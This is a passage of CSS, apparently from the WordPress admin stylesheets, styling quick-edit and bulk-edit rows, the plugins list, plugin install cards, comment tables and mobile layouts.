.inline-edit-col-center { width: 20%; } #wpbody-content .quick-edit-row-page .inline-edit-col-left { width: 50%; } #wpbody-content .quick-edit-row-page .inline-edit-col-right, #wpbody-content .bulk-edit-row-post .inline-edit-col-right { width: 50%; } #wpbody-content .bulk-edit-row .inline-edit-col-left { width: 30%; } #wpbody-content .bulk-edit-row-page .inline-edit-col-right { width: 69%; } #wpbody-content .bulk-edit-row .inline-edit-col-bottom { float: right; width: 69%; } #wpbody-content .inline-edit-row-page .inline-edit-col-right { margin-top: 27px; } .inline-edit-row fieldset .inline-edit-group { clear: both; line-height: 2.5; } .inline-edit-row .submit { display: flex; flex-wrap: wrap; align-items: center; clear: both; margin: 0; padding: 0.5em 0 1em; } .inline-edit-save.submit .button { margin-right: 8px; } .inline-edit-save .spinner { float: none; margin: 0; } .inline-edit-row .notice-error { box-sizing: border-box; min-width: 100%; margin-top: 1em; } .inline-edit-row .notice-error .error { margin: 0.5em 0; padding: 2px; } /* Positioning */ /* Needs higher specificity for the padding */ #the-list .inline-edit-row .inline-edit-legend { margin: 0; padding: 0.2em 0; line-height: 2.5; font-weight: 600; } .inline-edit-row fieldset span.title, .inline-edit-row fieldset span.checkbox-title { margin: 0; padding: 0; } .inline-edit-row fieldset label, .inline-edit-row fieldset span.inline-edit-categories-label { display: block; margin: .2em 0; line-height: 2.5; } .inline-edit-row fieldset.inline-edit-date label { display: inline-block; margin: 0; vertical-align: baseline; line-height: 2; } .inline-edit-row fieldset label.inline-edit-tags { margin-top: 0; } .inline-edit-row fieldset label.inline-edit-tags span.title { margin: .2em 0; width: auto; } .inline-edit-row fieldset label span.title, .inline-edit-row fieldset.inline-edit-date legend { display: block; float: left; width: 6em; line-height: 2.5; } #posts-filter fieldset.inline-edit-date legend { padding: 0; } .inline-edit-row fieldset label span.input-text-wrap, .inline-edit-row fieldset .timestamp-wrap { display: block; margin-left: 6em; } .quick-edit-row-post fieldset.inline-edit-col-right label span.title { width: auto; padding-right: 0.5em; } .inline-edit-row .inline-edit-or { margin: .2em 6px .2em 0; line-height: 2.5; } .inline-edit-row .input-text-wrap input[type=text] { width: 100%; } .inline-edit-row fieldset label input[type=checkbox] { vertical-align: middle; } .inline-edit-row fieldset label textarea { width: 100%; height: 4em; vertical-align: top; } .inline-edit-row select, .inline-edit-row input:where(:not([type=checkbox],[type=radio],[type=submit],[type=button])) { min-height: 32px; padding: 0 8px 0 8px; } .inline-edit-row select { line-height: 2.14285714; /* 30px for 32px height with 14px font */ padding-right: 24px; } #wpbody-content .bulk-edit-row fieldset .inline-edit-group label { max-width: 50%; } #wpbody-content .quick-edit-row fieldset .inline-edit-group label.alignleft:first-child { margin-right: 0.5em } .inline-edit-col-right .input-text-wrap input.inline-edit-menu-order-input { width: 6em; } /* Styling */ .inline-edit-row .inline-edit-legend { text-transform: uppercase; } /* Specific Elements */ .inline-edit-row fieldset .inline-edit-date { float: left; } .inline-edit-row fieldset input[name=jj], .inline-edit-row fieldset input[name=hh], .inline-edit-row fieldset input[name=mn], .inline-edit-row fieldset input[name=aa] { vertical-align: middle; text-align: center; padding: 0 4px; } .inline-edit-row fieldset label input.inline-edit-password-input { width: 8em; } #bulk-titles-list, #bulk-titles-list li, .inline-edit-row fieldset ul.cat-checklist li, .inline-edit-row fieldset ul.cat-checklist input { margin: 0; position: relative; /* RTL fix, #WP27629 */ } .inline-edit-row fieldset ul.cat-checklist input { margin-top: -1px; margin-left: 3px; } .inline-edit-row fieldset label input.inline-edit-menu-order-input { width: 3em; } .inline-edit-row fieldset label input.inline-edit-slug-input { width: 75%; } .inline-edit-row select[name="post_parent"], .inline-edit-row select[name="page_template"] { max-width: 80%; } .quick-edit-row-post fieldset label.inline-edit-status { float: left; } #bulk-titles, ul.cat-checklist { height: 14em; border: 1px solid #ddd; margin: 0 0 5px; padding: 0.2em 5px; overflow-y: scroll; } ul.cat-checklist input[name="post_category[]"]:indeterminate::before { content: ''; border-top: 2px solid grey; width: 65%; height: 2px; position: absolute; top: calc( 50% + 1px ); left: 50%; transform: translate( -50%, -50% ); } #bulk-titles .ntdelbutton, #bulk-titles .ntdeltitle, .inline-edit-row fieldset ul.cat-checklist label { display: inline-block; margin: 0; padding: 3px 0; line-height: 20px; vertical-align: top; } #bulk-titles .ntdelitem { padding-left: 23px; } #bulk-titles .ntdelbutton { width: 26px; height: 26px; margin: 0 0 0 -26px; text-align: center; border-radius: 3px; } #bulk-titles .ntdelbutton:before { display: inline-block; vertical-align: top; } #bulk-titles .ntdelbutton:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; /* Reset inherited offset from Gutenberg */ outline-offset: 0; } /*------------------------------------------------------------------------------ 17.0 - Plugins ------------------------------------------------------------------------------*/ .plugins tbody th.check-column, .plugins tbody { padding: 8px 0 0 2px; } .plugins tbody th.check-column input[type=checkbox] { margin-top: 4px; } .updates-table .plugin-title p { margin-top: 0; } .plugins thead td.check-column, .plugins tfoot td.check-column, .plugins .inactive th.check-column { padding-left: 6px; } .plugins, .plugins th, .plugins td { color: #000; } .plugins tr { background: #fff; } .plugins p { margin: 0 4px; padding: 0; } .plugins .desc p { margin: 0 0 8px; } .plugins td.desc { line-height: 1.5; } .plugins .desc ul, .plugins .desc ol { margin: 0 0 0 2em; } .plugins .desc ul { list-style-type: disc; } .plugins .row-actions { font-size: 13px; padding: 0; } .plugins .inactive td, .plugins .inactive th, .plugins .active td, .plugins .active th { padding: 10px 9px; } .plugins .active td, .plugins .active th { background-color: rgba(var(--wp-admin-theme-color--rgb), 0.08); } .plugins .update th, .plugins .update td { border-bottom: 0; } .plugins .inactive td, .plugins .inactive th, .plugins .active td, .plugins .active th, .plugin-install #the-list td, .upgrade .plugins td, .upgrade .plugins th { box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.1); } .plugins tr.active.plugin-update-tr + tr.inactive th, .plugins tr.active.plugin-update-tr + tr.inactive td, .plugins tr.active + tr.inactive th, .plugins tr.active + tr.inactive td { border-top: 1px solid rgba(0, 0, 0, 0.03); box-shadow: inset 0 1px 0 rgba(0, 0, 0, 0.02), inset 0 -1px 0 #dcdcde; } .plugins .update td, .plugins .update th, .upgrade .plugins tr:last-of-type td, .upgrade .plugins tr:last-of-type th, .plugins tr.active + tr.inactive.update th, .plugins tr.active + tr.inactive.update td, .plugins .updated td, .plugins .updated th, .plugins tr.active + tr.inactive.updated th, .plugins tr.active + tr.inactive.updated td { box-shadow: none; } .plugins .active th.check-column, .plugin-update-tr.active td { border-left: 4px solid var(--wp-admin-theme-color); } .wp-list-table.plugins .plugin-title, .wp-list-table.plugins .theme-title { padding-right: 12px; white-space: nowrap; } .plugins .plugin-title .dashicons, .plugins .plugin-title img.plugin-icon, .plugins .plugin-title img.updates-table-screenshot { float: left; padding: 0 10px 0 0; width: 64px; height: 64px; } .plugins .plugin-title .dashicons:before { padding: 2px; background-color: #f0f0f1; box-shadow: inset 0 0 10px rgba(167, 170, 173, 0.15); font-size: 60px; color: #c3c4c7; } #update-themes-table .plugin-title img.updates-table-screenshot, #update-themes-table .plugin-title .dashicons { width: 85px; } .plugins .column-auto-updates { width: 14.2em; } .plugins .inactive .plugin-title strong { font-weight: 400; } .plugins .second, .plugins .row-actions { padding: 0 0 5px; } .plugins .row-actions { white-space: normal; min-width: 12em; } .plugins .update .second, .plugins .update .row-actions, .plugins .updated .second, .plugins .updated .row-actions { padding-bottom: 0; } .plugins-php .widefat tfoot th, .plugins-php .widefat tfoot td { border-top-style: solid; border-top-width: 1px; } .plugins .plugin-update-tr .plugin-update { box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.1); overflow: hidden; /* clearfix */ padding: 0; } .plugins .plugin-update-tr .notice, .plugins .plugin-update-tr div[class="update-message"] { /* back-compat for pre-4.6 */ margin: 5px 20px 15px 40px; } .plugins .notice p { margin: 0.5em 0; } .plugins .plugin-description a, .plugins .plugin-update a, .updates-table .plugin-title a { text-decoration: underline; } .plugins tr.paused th.check-column { border-left: 4px solid #b32d2e; } .plugins tr.paused th, .plugins tr.paused td { background-color: #f6f7f7; } .plugins tr.paused .plugin-title, .plugins .paused .dashicons-warning { color: #b32d2e; } .plugins .paused .error-display p, .plugins .paused .error-display code { font-size: 90%; color: rgba(0, 0, 0, 0.7); } .plugins .resume-link { color: #b32d2e; } .plugin-card .update-now:before { color: #d63638; content: "\f463"; content: "\f463" / ''; display: inline-block; font: normal 16px/1.875 dashicons; /* line-height 1.875 = 30px to match button */ margin: 0 5px 0 -2px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; vertical-align: top; } .plugin-card .updating-message:before { content: "\f463"; content: "\f463" / ''; animation: rotation 2s infinite linear; } @keyframes rotation { 0% { transform: rotate(0deg); } 100% { transform: rotate(359deg); } } .plugin-card .updated-message:before { color: #68de7c; content: "\f147"; content: "\f147" / ''; } .plugin-card .updated-message:before, .plugin-card .updating-message:before { line-height: 1; position: relative; top: -2px; vertical-align: middle; } .plugin-install-php #the-list { display: flex; flex-wrap: wrap; } .plugin-install-php .plugin-card { display: flex; flex-direction: column; justify-content: space-between; } .plugin-install-php h2 { clear: both; } .plugin-install-php h3 { margin: 2.5em 0 8px; } .plugin-install-php .wp-filter { margin-bottom: 0; } /* Plugin card table view */ .plugin-group { overflow: hidden; /* clearfix */ margin-top: 1.5em; } .plugin-group h3 { margin-top: 0; } .plugin-card { float: left; margin: 0 8px 16px; width: 48.5%; width: calc( 50% - 8px ); background-color: #ffffff; border: 1px solid rgb(0, 0, 0, 0.1); border-radius: 8px; box-sizing: border-box; overflow: hidden; } .plugin-card:nth-child(odd) { clear: both; margin-left: 0; } .plugin-card:nth-child(even) { margin-right: 0; } @media screen and (min-width: 1600px) and ( max-width: 2299px ) { .plugin-card { width: 30%; width: calc( 33.1% - 8px ); } .plugin-card:nth-child(odd) { clear: none; margin-left: 8px; } .plugin-card:nth-child(even) { margin-right: 8px; } .plugin-card:nth-child(3n+1) { clear: both; margin-left: 0; } .plugin-card:nth-child(3n) { margin-right: 0; } } @media screen and (min-width: 2300px) { .plugin-card { width: 25%; width: calc( 25% - 12px ); } .plugin-card:nth-child(odd) { clear: none; margin-left: 8px; } .plugin-card:nth-child(even) { margin-right: 8px; } .plugin-card:nth-child(4n+1) { clear: both; margin-left: 0; } .plugin-card:nth-child(4n) { margin-right: 0; } } .plugin-card-top { position: relative; padding: 16px; min-height: 135px; } div.action-links, .plugin-action-buttons { margin: 0; /* Override existing margins */ } .plugin-card h3 { margin: 0 12px 16px 0; font-size: 18px; line-height: 1.3; } .plugin-card .desc { margin-inline: 0; } .plugin-card .name, .plugin-card .desc > p { margin-left: 148px; } @media (min-width: 1101px) { .plugin-card .name, .plugin-card .desc > p { margin-right: 128px; } } @media (min-width: 481px) and (max-width: 781px) { .plugin-card .name, .plugin-card .desc > p { margin-right: 128px; } } .plugin-card .column-description { display: flex; flex-direction: column; justify-content: flex-start; } .plugin-card .column-description > p { margin-top: 0; } .plugin-card .column-description p:empty { display: none; } .plugin-card .notice.plugin-dependencies { margin: auto 20px 20px; padding: 15px; } .plugin-card .plugin-dependencies-explainer-text { margin-block: 0; } .plugin-card .plugin-dependency { align-items: center; display: flex; flex-wrap: wrap; margin-top: .5em; column-gap: 1%; row-gap: .5em; } .plugin-card .plugin-dependency:nth-child(2), .plugin-card .plugin-dependency:last-child { margin-top: 1em; } .plugin-card .plugin-dependency-name { flex-basis: 74%; } .plugin-card .plugin-dependency .more-details-link { margin-left: auto; } .rtl .plugin-card .plugin-dependency .more-details-link { margin-right: auto; } @media (max-width: 939px) { .plugin-card .plugin-dependency-name { flex-basis: 69%; } } .plugins #the-list .required-by, .plugins #the-list .requires { margin-top: 1em; } .plugin-card .action-links { position: absolute; top: 20px; right: 20px; width: 120px; } .plugin-action-buttons { clear: right; float: right; margin-bottom: 1em; text-align: right; } .plugin-action-buttons li { margin-bottom: 10px; } .plugin-card-bottom { clear: both; padding: 16px; background-color: #f6f7f7; border-top: 1px solid rgb(0, 0, 0, 0.1); overflow: hidden; } .plugin-card-bottom .star-rating { display: inline; } .plugin-card-update-failed .update-now { font-weight: 600; } .plugin-card-update-failed .notice-error { margin: 0; padding-left: 16px; box-shadow: 0 -1px 0 #dcdcde; } .plugin-card-update-failed .plugin-card-bottom { display: none; } .plugin-card .column-rating { line-height: 1.76923076; } .plugin-card .column-rating, .plugin-card .column-updated { margin-bottom: 4px; } .plugin-card .column-rating, .plugin-card .column-downloaded { float: left; clear: left; max-width: 180px; } .plugin-card .column-updated, .plugin-card .column-compatibility { text-align: right; float: right; clear: right; width: 65%; width: calc( 100% - 180px ); } .plugin-card .column-compatibility span:before { font: normal 20px/.5 dashicons; display: inline-block; padding: 0; top: 4px; left: -2px; position: relative; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none !important; color: #3c434a; } .plugin-card .column-compatibility .compatibility-incompatible:before { content: "\f158"; content: "\f158" / ''; color: #d63638; } .plugin-card .column-compatibility .compatibility-compatible:before { content: "\f147"; content: "\f147" / ''; color: #007017; } .plugin-card .notice { margin: 20px 20px 0; } .plugin-card .plugin-icon { position: absolute; top: 20px; left: 20px; width: 128px; height: 128px; margin: 0 20px 20px 0; } .no-plugin-results { color: #646970; /* same as no themes and no media */ font-size: 18px; font-style: normal; margin: 0; padding: 100px 0 0; width: 100%; text-align: center; } /* ms */ /* Background Color for Site Status */ .wp-list-table .site-deleted, .wp-list-table tr.site-deleted, .wp-list-table .site-archived, .wp-list-table tr.site-archived { background: #fcf0f1; } .wp-list-table .site-spammed, .wp-list-table tr.site-spammed, .wp-list-table .site-mature, .wp-list-table tr.site-mature { background: #fcf9e8; } .sites.fixed .column-lastupdated, .sites.fixed .column-registered { width: 20%; } .sites.fixed .column-users { width: 80px; } /* =Media Queries -------------------------------------------------------------- */ @media screen and (max-width: 1100px) and (min-width: 782px), (max-width: 480px) { .plugin-card .action-links { position: static; margin-left: 148px; width: auto; } .plugin-action-buttons { float: none; margin: 1em 0 0; text-align: left; } .plugin-action-buttons li { display: inline-block; vertical-align: middle; } .plugin-action-buttons li .button { margin-right: 20px; } .plugin-card h3 { margin-right: 24px; } .plugin-card .name, .plugin-card .desc { margin-right: 0; } .plugin-card .desc p:first-of-type { margin-top: 0; } } @media screen and (max-width: 782px) { /* WP List Table Options & Filters */ .tablenav { height: auto; } .tablenav.top { margin: 20px 0 5px; } .tablenav.bottom { position: relative; margin-top: 15px; } .tablenav br { display: none; } .tablenav br.clear { display: block; } .tablenav.top .actions, .tablenav .view-switch { display: none; } .view-switch a { width: 36px; height: 36px; line-height: 2.53846153; } /* Pagination */ .tablenav.top .displaying-num { display: none; } .tablenav.bottom .displaying-num { position: absolute; right: 0; top: 11px; margin: 0; font-size: 14px; } .tablenav .tablenav-pages { width: 100%; text-align: center; margin: 0 0 25px; } .tablenav.bottom .tablenav-pages { margin-top: 25px; } .tablenav.top .tablenav-pages.one-page { display: none; } .tablenav.bottom .actions select { margin-bottom: 5px; } .tablenav.bottom .actions.alignleft + .actions.alignleft { clear: left; margin-top: 10px; } .tablenav.bottom .tablenav-pages.one-page { margin-top: 15px; height: 0; } .tablenav-pages .pagination-links { font-size: 16px; } .tablenav .tablenav-pages .button, .tablenav .tablenav-pages .tablenav-pages-navspan { min-width: 40px; min-height: 40px; padding: 10px 8px; font-size: 18px; line-height: 1; } .tablenav-pages .pagination-links .current-page { min-width: 40px; padding: 10px 6px; font-size: 16px; line-height: 1.125; } /* WP List Table Adjustments: General */ .form-wrap > p { display: none; } .wp-list-table th.column-primary ~ th, .wp-list-table tr:not(.inline-edit-row):not(.no-items) td.column-primary ~ td:not(.check-column) { display: none; } .wp-list-table thead th.column-primary { width: 100%; } /* Checkboxes need to show */ .wp-list-table tr th.check-column { display: table-cell; } .wp-list-table .check-column { width: 2.5em; } .wp-list-table .column-primary .toggle-row { display: block; } .wp-list-table tr:not(.inline-edit-row):not(.no-items) td:not(.check-column) { position: relative; clear: both; width: auto !important; /* needs to override some columns that are more specifically targeted */ } .wp-list-table td.column-primary { padding-right: 50px; /* space for toggle button */ } .wp-list-table tr:not(.inline-edit-row):not(.no-items) td.column-primary ~ td:not(.check-column) { padding: 3px 8px 3px 35%; } .wp-list-table tr:not(.inline-edit-row):not(.no-items) td:not(.column-primary)::before { position: absolute; left: 10px; /* match padding of regular table cell */ display: block; overflow: hidden; width: 32%; /* leave a little space for a gutter */ content: attr(data-colname); white-space: nowrap; text-overflow: ellipsis; } .wp-list-table .is-expanded td:not(.hidden) { display: block !important; overflow: hidden; /* clearfix */ } /* Special cases */ .widefat .num, .column-posts { text-align: left; } #comments-form .fixed .column-author, #commentsdiv .fixed .column-author { display: none !important; } .fixed .column-comment .comment-author { display: block; } /* Comment author hidden via Screen Options */ .fixed .column-author.hidden ~ .column-comment .comment-author { display: none; } #the-comment-list .is-expanded td { box-shadow: none; } #the-comment-list .is-expanded td:last-child { box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.1); } /* Show comment bubble as text instead */ .post-com-count .screen-reader-text { position: static; clip-path: none; width: auto; height: auto; margin: 0; } .column-response .post-com-count-no-comments:after, .column-response .post-com-count-approved:after, .column-comments .post-com-count-no-comments:after, .column-comments .post-com-count-approved:after { content: none; } .column-response .post-com-count [aria-hidden="true"], .column-comments .post-com-count [aria-hidden="true"] { display: none; } .column-response .post-com-count-wrapper, .column-comments .post-com-count-wrapper { white-space: normal; } .column-response .post-com-count-wrapper > a, .column-comments .post-com-count-wrapper > a { display: block; } .column-response .post-com-count-no-comments, .column-response .post-com-count-approved, .column-comments .post-com-count-no-comments, .column-comments .post-com-count-approved { margin-top: 0; margin-right: 0.5em; } .column-response .post-com-count-pending, .column-comments .post-com-count-pending { position: static; height: auto; min-width: 0; padding: 0; border: none; border-radius: 0; background: none; color: #b32d2e; font-size: inherit; line-height: inherit; text-align: left; } .column-response .post-com-count-pending:hover, .column-comments .post-com-count-pending:hover { color: #d63638; } .widefat thead td.check-column, .widefat tfoot td.check-column { padding-top: 10px; } .row-actions { margin-right: -8px; padding-top: 4px; } /* Make row actions more easy to select on mobile */ body:not(.plugins-php) .row-actions { display: flex; flex-wrap: wrap; gap: 8px; color: transparent; } .row-actions span { font-size: 0; } .row-actions span a, .row-actions span .button-link { display: inline-block; padding: 4px 16px 4px 0; font-size: 13px; line-height: 1.5; } .row-actions span.approve:before, .row-actions span.unapprove:before { content: "| "; } /* Quick Edit and Bulk Edit */ #wpbody-content .quick-edit-row-post .inline-edit-col-left, #wpbody-content .quick-edit-row-post .inline-edit-col-right, #wpbody-content .inline-edit-row-post .inline-edit-col-center, #wpbody-content .quick-edit-row-page .inline-edit-col-left, #wpbody-content .quick-edit-row-page .inline-edit-col-right, #wpbody-content .bulk-edit-row-post .inline-edit-col-right, #wpbody-content .bulk-edit-row .inline-edit-col-left, #wpbody-content .bulk-edit-row-page .inline-edit-col-right, #wpbody-content .bulk-edit-row .inline-edit-col-bottom { float: none; width: 100%; padding: 0; } #the-list .inline-edit-row .inline-edit-legend, .inline-edit-row span.title { font-size: 16px; } .inline-edit-row p.howto { font-size: 14px; } #wpbody-content .inline-edit-row-page .inline-edit-col-right { margin-top: 0; } #wpbody-content .quick-edit-row fieldset .inline-edit-col label, #wpbody-content .quick-edit-row fieldset .inline-edit-group label, #wpbody-content .bulk-edit-row fieldset .inline-edit-col label, #wpbody-content .bulk-edit-row fieldset .inline-edit-group label { max-width: none; float: none; margin-bottom: 5px; } #wpbody .bulk-edit-row fieldset select { display: block; width: 100%; max-width: none; box-sizing: border-box; } .inline-edit-row select, .inline-edit-row input:where(:not([type=checkbox],[type=radio],[type=submit],[type=button])) { min-height: 40px; } .inline-edit-row fieldset input[name=jj], .inline-edit-row fieldset input[name=hh], .inline-edit-row fieldset input[name=mn], .inline-edit-row fieldset input[name=aa] { font-size: 16px; line-height: 2; padding: 3px 4px; } #bulk-titles .ntdelbutton, #bulk-titles .ntdeltitle, .inline-edit-row fieldset ul.cat-checklist label { padding: 6px 0; font-size: 16px; line-height: 28px; } #bulk-titles .ntdelitem { padding-left: 37px; } #bulk-titles .ntdelbutton { width: 40px; height: 40px; margin: 0 0 0 -40px; overflow: hidden; } #bulk-titles .ntdelbutton:before { font-size: 20px; line-height: 28px; } .inline-edit-row fieldset label span.title, .inline-edit-row fieldset.inline-edit-date legend { float: none; } .inline-edit-row fieldset .inline-edit-col label.inline-edit-tags { padding: 0; } .inline-edit-row fieldset label span.input-text-wrap, .inline-edit-row fieldset .timestamp-wrap { margin-left: 0; } .inline-edit-row .inline-edit-or { margin: 0 6px 0 0; } #edithead .inside, #commentsdiv #edithead .inside { float: none; text-align: left; padding: 3px 5px; } #commentsdiv #edithead .inside input, #edithead .inside input { width: 100%; } #edithead label { display: block; } /* Updates */ #wpbody-content .updates-table .plugin-title { width: auto; white-space: normal; } /* Links */ .link-manager-php #posts-filter { margin-top: 25px; } .link-manager-php .tablenav.bottom { overflow: hidden; } /* List tables that don't toggle rows */ .comments-box .toggle-row, .wp-list-table.plugins .toggle-row { display: none; } /* Plugin/Theme Management */ #wpbody-content .wp-list-table.plugins td { display: block; width: auto; padding: 10px 9px; /* reset from other list tables that have a label at this width */ } #wpbody-content .wp-list-table.plugins .plugin-deleted-tr td, #wpbody-content .wp-list-table.plugins .no-items td { display: table-cell; } /* Plugin description hidden via Screen Options */ #wpbody-content .wp-list-table.plugins .desc.hidden { display: none; } #wpbody-content .wp-list-table.plugins .column-description { padding-top: 2px; } #wpbody-content .wp-list-table.plugins .plugin-title, #wpbody-content .wp-list-table.plugins .theme-title { padding-right: 12px; white-space: normal; } .wp-list-table.plugins .plugin-title, .wp-list-table.plugins .theme-title { padding-top: 13px; padding-bottom: 4px; } .plugins #the-list tr > td:not(:last-child), .plugins #the-list .update th, .plugins #the-list .update td, .wp-list-table.plugins #the-list .theme-title { box-shadow: none; border-top: none; } .plugins #the-list tr td { border-top: none; } .plugins tbody { padding: 1px 0 0; } .plugins tr.active + tr.inactive th.check-column, .plugins tr.active + tr.inactive td.column-description, .plugins .plugin-update-tr:before { box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.1); } .plugins tr.active + tr.inactive th.check-column, .plugins tr.active + tr.inactive td { border-top: none; } /* mimic the checkbox th */ .plugins .plugin-update-tr:before { content: ""; display: table-cell; } .plugins #the-list .plugin-update-tr .plugin-update { border-left: none; } .plugin-update-tr .update-message { margin-left: 0; } .plugins .active.update + .plugin-update-tr:before, .plugins .active.updated + .plugin-update-tr:before { background-color: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-left: 4px solid var(--wp-admin-theme-color); } .plugins .plugin-update-tr .update-message { margin-left: 0; } .wp-list-table.plugins .plugin-title strong, .wp-list-table.plugins .theme-title strong { font-size: 1.4em; line-height: 1.5; } .plugins tbody th.check-column { padding: 8px 0 0 5px; } .plugins thead td.check-column, .plugins tfoot td.check-column, .plugins .inactive th.check-column { padding-left: 9px; } /* Add New plugins page */ table.plugin-install .column-name, table.plugin-install .column-version, table.plugin-install .column-rating, table.plugin-install .column-description { display: block; width: auto; } table.plugin-install th.column-name, table.plugin-install th.column-version, table.plugin-install th.column-rating, table.plugin-install th.column-description { display: none; } table.plugin-install td.column-name strong { font-size: 1.4em; line-height: 1.6em; } table.plugin-install #the-list td { box-shadow: none; } table.plugin-install #the-list tr { display: block; box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.1); } .plugin-card { margin-left: 0; margin-right: 0; width: 100%; } table.media .column-title .has-media-icon ~ .row-actions { margin-left: 0; clear: both; } } @media screen and (max-width: 480px) { .tablenav-pages .current-page { margin: 0; } .tablenav.bottom .displaying-num { position: relative; top: 0; display: block; text-align: right; padding-bottom: 0.5em; } .tablenav.bottom .tablenav-pages.one-page { height: auto; } .tablenav-pages .tablenav-paging-text { float: left; width: 100%; padding-top: 0.5em; } } /*! This file is auto-generated */ .response-links{display:block;margin-bottom:1em}.response-links a{display:block}.response-links a.comments-edit-item-link{font-weight:600}.response-links a.comments-view-item-link{font-size:12px}.post-com-count-wrapper strong{font-weight:400}.comments-view-item-link{display:inline-block;clear:both}.column-comments .post-com-count-wrapper,.column-response .post-com-count-wrapper{white-space:nowrap;word-wrap:normal}.column-comments .post-com-count,.column-response .post-com-count{display:inline-block;vertical-align:top}.column-comments .post-com-count-approved,.column-comments .post-com-count-no-comments,.column-response .post-com-count-approved,.column-response .post-com-count-no-comments{margin-top:5px}.column-comments .comment-count-approved,.column-comments .comment-count-no-comments,.column-response .comment-count-approved,.column-response .comment-count-no-comments{box-sizing:border-box;display:block;padding:0 8px;min-width:24px;height:2em;border-radius:5px;background-color:#646970;color:#fff;font-size:11px;line-height:1.90909090;text-align:center}.column-comments .post-com-count-approved:after,.column-comments .post-com-count-no-comments:after,.column-response .post-com-count-approved:after,.column-response .post-com-count-no-comments:after{content:"";display:block;margin-right:8px;width:0;height:0;border-top:5px solid #646970;border-left:5px solid transparent}.column-comments a.post-com-count-approved:focus .comment-count-approved,.column-comments a.post-com-count-approved:hover .comment-count-approved,.column-response a.post-com-count-approved:focus .comment-count-approved,.column-response a.post-com-count-approved:hover .comment-count-approved{background:#3858e9}.column-comments a.post-com-count-approved:focus:after,.column-comments a.post-com-count-approved:hover:after,.column-response a.post-com-count-approved:focus:after,.column-response a.post-com-count-approved:hover:after{border-top-color:#3858e9}.column-comments .post-com-count-pending,.column-response .post-com-count-pending{position:relative;right:-3px;padding:0 5px;min-width:7px;height:17px;border:2px solid #fff;border-radius:11px;background:#d63638;color:#fff;font-size:9px;line-height:1.88888888;text-align:center}.column-comments .post-com-count-no-pending,.column-response .post-com-count-no-pending{display:none}.commentlist li{padding:1em 1em .2em;margin:0;border-bottom:1px solid #c3c4c7}.commentlist li li{border-bottom:0;padding:0}.commentlist p{padding:0;margin:0 0 .8em}#submitted-on,.submitted-on{color:#50575e}#replyrow td{padding:2px}#replysubmit{margin:0;padding:5px 7px 10px;overflow:hidden}#replysubmit .reply-submit-buttons{margin-bottom:0}#replysubmit .button{margin-left:5px}#replysubmit .spinner{float:none;margin:-4px 0 0}#replyrow.inline-edit-row fieldset.comment-reply{font-size:inherit;line-height:inherit}#replyrow legend{margin:0;padding:.2em 5px 0;font-size:13px;line-height:1.4;font-weight:600}#replyrow.inline-edit-row label{display:inline;vertical-align:baseline;line-height:inherit}#commentsdiv #edithead .inside,#edithead .inside{float:right;padding:3px 5px 2px 0;margin:0;text-align:center}#edithead .inside input{width:180px}#edithead label{padding:2px 0}#replycontainer{padding:5px}#replycontent{height:120px;box-shadow:none}#replyerror{border-color:#dcdcde;background-color:#f6f7f7}.commentlist .avatar{vertical-align:text-top}#the-comment-list div.undo,#the-comment-list tr.undo{background-color:#f6f7f7}#the-comment-list .unapproved td,#the-comment-list .unapproved th{background-color:#fcf9e8}#the-comment-list .unapproved th.check-column{border-right:4px solid #d63638}#the-comment-list .unapproved th.check-column input{margin-right:4px}#the-comment-list .approve a{color:#007017}#the-comment-list .unapprove a{color:#996800}#the-comment-list td,#the-comment-list th{box-shadow:inset 0 -1px 0 rgba(0,0,0,.1)}#the-comment-list tr:last-child td,#the-comment-list tr:last-child th{box-shadow:none}#the-comment-list tr.unapproved+tr.approved td,#the-comment-list tr.unapproved+tr.approved th{border-top:1px solid rgba(0,0,0,.03)}.vim-current,.vim-current td,.vim-current th{background-color:rgba(var(--wp-admin-theme-color--rgb),.08)!important}th .comment-grey-bubble{width:16px;position:relative;top:2px}th .comment-grey-bubble:before{content:"\f101";content:"\f101"/'';font:normal 20px/.5 dashicons;display:inline-block;padding:0;top:4px;right:-4px;position:relative;vertical-align:top;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-decoration:none!important;color:#3c434a}table.fixed{table-layout:fixed}.fixed .column-rating,.fixed .column-visible{width:8%}.fixed .column-author,.fixed .column-format,.fixed .column-links,.fixed .column-parent,.fixed .column-posts{width:10%}.fixed .column-date{width:14%}.column-date span[title]{-webkit-text-decoration:dotted underline;text-decoration:dotted underline}.fixed .column-posts{width:74px}.fixed .column-posts,.fixed .column-role{hyphens:auto}.fixed .column-comment .comment-author{display:none}.fixed .column-categories,.fixed .column-rel,.fixed .column-response,.fixed .column-role,.fixed .column-tags{width:15%}.fixed .column-slug{width:25%}.fixed .column-locations{width:35%}.fixed .column-comments{width:5.5em;text-align:right}.fixed .column-comments .vers{padding-right:3px}td.column-title strong,td.plugin-title strong{display:block;margin-bottom:.2em;font-size:14px}td.column-title p,td.plugin-title p{margin:6px 0}table.media .column-title .media-icon{float:right;min-height:60px;margin:0 0 0 9px}table.media .column-title .media-icon img{max-width:60px;height:auto;vertical-align:top}table.media .column-title .has-media-icon~.row-actions{margin-right:70px}table.media .column-title .filename{margin-bottom:.2em}.media .row-actions .copy-to-clipboard-container{display:inline;position:relative}.media .row-actions .copy-to-clipboard-container .success{position:absolute;right:50%;transform:translate(50%,-100%);background:#000;color:#fff;border-radius:5px;margin:0;padding:2px 5px}.wp-list-table a{transition:none}#the-list tr:last-child td,#the-list tr:last-child th{border-bottom:none!important;box-shadow:none}#comments-form .fixed .column-author{width:20%}#commentsdiv.postbox .inside{margin:0;padding:0}#commentsdiv .inside .row-actions{line-height:1.38461538}#commentsdiv .inside .column-author{width:25%}#commentsdiv .column-comment p{margin:.6em 0;padding:0}#commentsdiv #replyrow td{padding:0}#commentsdiv p{padding:8px 10px;margin:0}#commentsdiv .comments-box{border:0 none}#commentsdiv .comments-box thead td,#commentsdiv .comments-box thead th{background:0 0;padding:0 7px 4px}#commentsdiv .comments-box tr:last-child td{border-bottom:0 